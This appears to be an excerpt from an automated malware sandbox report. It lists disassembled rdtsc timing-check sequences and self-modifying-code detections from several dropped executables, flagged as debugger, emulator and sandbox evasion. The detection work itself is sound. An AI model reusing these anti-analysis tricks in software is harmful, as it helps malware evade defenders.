Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120EDB second address: 1120EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E38 second address: 1125E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E796h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E53 second address: 1125E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E58 second address: 1125E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E64 second address: 1125E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1125E6A second address: 1125E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126143 second address: 1126159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jne 00007F40B515FC1Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F40B515FBF6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11262DC second address: 11262E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11262E1 second address: 11262E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126585 second address: 1126589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126589 second address: 112659E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F40B515FBFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 112659E second address: 11265AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F40B477E786h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126735 second address: 1126739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126739 second address: 1126751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnc 00007F40B477E786h 0x00000011 jnl 00007F40B477E786h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126751 second address: 1126756 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126756 second address: 112676D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Ah 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F40B477E786h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128D97 second address: 1128DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128DA0 second address: FAEA3C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jng 00007F40B477E792h 0x00000011 pop eax 0x00000012 jmp 00007F40B477E792h 0x00000017 push dword ptr [ebp+122D12C9h] 0x0000001d call 00007F40B477E78Dh 0x00000022 jmp 00007F40B477E78Ah 0x00000027 pop edx 0x00000028 call dword ptr [ebp+122D17FBh] 0x0000002e pushad 0x0000002f sub dword ptr [ebp+122D1A10h], ebx 0x00000035 xor eax, eax 0x00000037 jmp 00007F40B477E794h 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 mov dword ptr [ebp+122D1A10h], edx 0x00000046 mov dword ptr [ebp+122D27F2h], eax 0x0000004c jmp 00007F40B477E797h 0x00000051 mov esi, 0000003Ch 0x00000056 pushad 0x00000057 mov dword ptr [ebp+122D1886h], esi 0x0000005d xor dword ptr [ebp+122D1886h], ecx 0x00000063 popad 0x00000064 clc 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jmp 00007F40B477E78Eh 0x0000006e lodsw 0x00000070 jmp 00007F40B477E791h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 sub dword ptr [ebp+122D1A10h], ebx 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 jnp 00007F40B477E79Fh 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c js 00007F40B477E78Ch 0x00000092 jl 00007F40B477E786h 0x00000098 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128EDF second address: 1128EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128EE3 second address: 1128EED instructions: 0x00000000 rdtsc 0x00000002 jg 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128EED second address: 1128EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1128F51 second address: 1128F5E instructions: 0x00000000 rdtsc 0x00000002 je 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1129045 second address: 112904F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1129111 second address: 112919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F40B477E799h 0x0000000e nop 0x0000000f jmp 00007F40B477E793h 0x00000014 push 00000000h 0x00000016 mov di, E869h 0x0000001a push FDA12128h 0x0000001f jmp 00007F40B477E78Fh 0x00000024 add dword ptr [esp], 025EDF58h 0x0000002b mov dword ptr [ebp+122D2B60h], ebx 0x00000031 push 00000003h 0x00000033 mov ecx, 73011411h 0x00000038 mov si, 9F92h 0x0000003c push 00000000h 0x0000003e jnc 00007F40B477E78Bh 0x00000044 mov edi, 0D22FDEDh 0x00000049 push 00000003h 0x0000004b mov edx, esi 0x0000004d push CD1BDBBCh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jo 00007F40B477E786h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 112919A second address: 112919F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 112919F second address: 11291D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 0D1BDBBCh 0x00000010 sub edx, 6A2CE8A5h 0x00000016 lea ebx, dword ptr [ebp+1244DCCFh] 0x0000001c add edi, dword ptr [ebp+122D2BC2h] 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jg 00007F40B477E788h 0x0000002b push edi 0x0000002c pop edi 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148938 second address: 114893E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114893E second address: 1148976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E795h 0x00000009 popad 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007F40B477E799h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146A41 second address: 1146A4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146A4F second address: 1146A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F40B477E786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146E49 second address: 1146E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146E51 second address: 1146E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146E57 second address: 1146E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146F97 second address: 1146FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1146FA1 second address: 1146FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007F40B515FBF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11472AE second address: 11472B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11472B5 second address: 11472C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F40B515FBF6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476B6 second address: 11476BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476BA second address: 11476C2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476C2 second address: 11476C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476C8 second address: 11476CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11476CC second address: 11476D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1147831 second address: 114783D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBFEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114783D second address: 114784D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F40B477E78Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114784D second address: 1147853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1147853 second address: 114785F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F40B477E786h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114785F second address: 114787F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jc 00007F40B515FBF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 113FE5E second address: 113FE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11484F3 second address: 11484FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148747 second address: 114874D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114874D second address: 1148751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148751 second address: 1148755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148755 second address: 1148774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC06h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148774 second address: 1148787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1148787 second address: 11487C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F40B515FC08h 0x0000000f jmp 00007F40B515FC07h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 11487C0 second address: 11487CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F40B477E786h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB4D second address: 114BB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB5C second address: 114BB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB60 second address: 114BB86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FC03h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB86 second address: 114BB9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F40B477E786h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BB9C second address: 114BBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114BBA1 second address: 114BBA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 114CD3D second address: 114CD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1116C08 second address: 1116C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3DEB9C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 57E679 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 57E30B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5A760E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 6086E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Special instruction interceptor: First address: FAEA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Special instruction interceptor: First address: FAC59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Special instruction interceptor: First address: 1172BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Special instruction interceptor: First address: 11D36CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4FEA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4FC59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 6C2BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7236CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: A81CC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: A81C2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: C20BC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: C1FB1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: A7F1EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Special instruction interceptor: First address: CAB5EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Special instruction interceptor: First address: 19DF01 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Special instruction interceptor: First address: 34ADD3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Special instruction interceptor: First address: 376624 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Special instruction interceptor: First address: 1A3335 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: 9FEB9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: B9E679 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: B9E30B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: BC760E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Special instruction interceptor: First address: C286E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: E01CC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: E01C2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: FA0BC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: F9FB1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: DFF1EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Special instruction interceptor: First address: 102B5EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Special instruction interceptor: First address: E9EA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Special instruction interceptor: First address: E9C59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Special instruction interceptor: First address: 1062BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Special instruction interceptor: First address: 10C36CA instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

